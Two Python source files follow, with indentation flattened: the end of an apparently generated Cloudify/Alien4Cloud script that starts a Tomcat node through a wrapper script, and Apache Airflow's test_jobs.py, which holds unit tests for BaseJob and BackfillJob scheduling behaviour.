for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
ctx.logger.info('Check whether a mapping exists for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exists and concerns SELF, just get the attribute of the mapped attribute name.
# Else if it concerns TARGET, follow the relationship and retrieve the mapped attribute name from the TARGET.
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
env_map = {}
env_map['NODE'] = ctx.node.id
env_map['INSTANCE'] = ctx.instance.id
env_map['INSTANCES'] = get_instance_list(ctx.node.id)
env_map['HOST'] = get_host_node_name(ctx.instance)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx)
env_map['TOMCAT_HOME'] = r'/opt/tomcat'
env_map['TOMCAT_PORT'] = r'80'
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
pattern = re.compile(r'EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
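# Illustrative example (not part of the original script): parse_output follows the
# EXPECTED_OUTPUT_<NAME>=<value> convention emitted by the script wrapper, e.g.
#   parse_output('starting tomcat...\nEXPECTED_OUTPUT_TOMCAT_PORT=80')
#   returns {'last_output': 'starting tomcat...', 'outputs': {'TOMCAT_PORT': '80'}}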
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
ctx.logger.info('Output name: {0} value: {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/Tomcat/tosca.interfaces.node.lifecycle.Standard/start/tomcat_start.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:start:{0}'.format(k)] = v
ctx.instance.runtime_properties['server_url'] = r'http://' + get_attribute(ctx, 'public_ip_address') + r':' + r'80'
ctx.instance.update()
|
test_jobs.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from mock import Mock, patch, MagicMock, PropertyMock
from parameterized import parameterized
from airflow.utils.db import create_session
from airflow import AirflowException, settings, models
from airflow import configuration
from airflow.bin import cli
import airflow.example_dags
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI, \
errors
from airflow.models.slamiss import SlaMiss
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
configuration.load_test_config()
logger = logging.getLogger(__name__)
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super(BaseJobTest.TestJob, self).__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEqual(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
def setUp(self):
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == 'example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be careful, not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
include_dags = {
'example_branch_operator',
'example_bash_operator',
'example_skip_dag',
'latest_only'
}
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id in include_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# Make sure that we have the dags that we want to test available
# in the example_dags folder, if this assertion fails, one of the
# dags in the include_dags array isn't available anymore
self.assertEqual(len(include_dags), len(dags))
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_conf(self):
dag = DAG(
dag_id='test_backfill_conf',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
def test_backfill_run_rescheduled(self):
dag = DAG(
dag_id='test_backfill_run_rescheduled',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_run_rescheduled_task-1',
dag=dag,
)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check that the tasks are queued in the right order. Every loop has a 'pause' (0 queued
# tasks) to change state from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEqual(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEqual(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEqual(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay_on_limit argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
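# condition used to coordinate the backfill thread with the main thread:
# it is notified once the out-of-range dag run below has been created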
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count towards the
# max active limit, as it falls within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given that the limit on active dag runs is 1, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
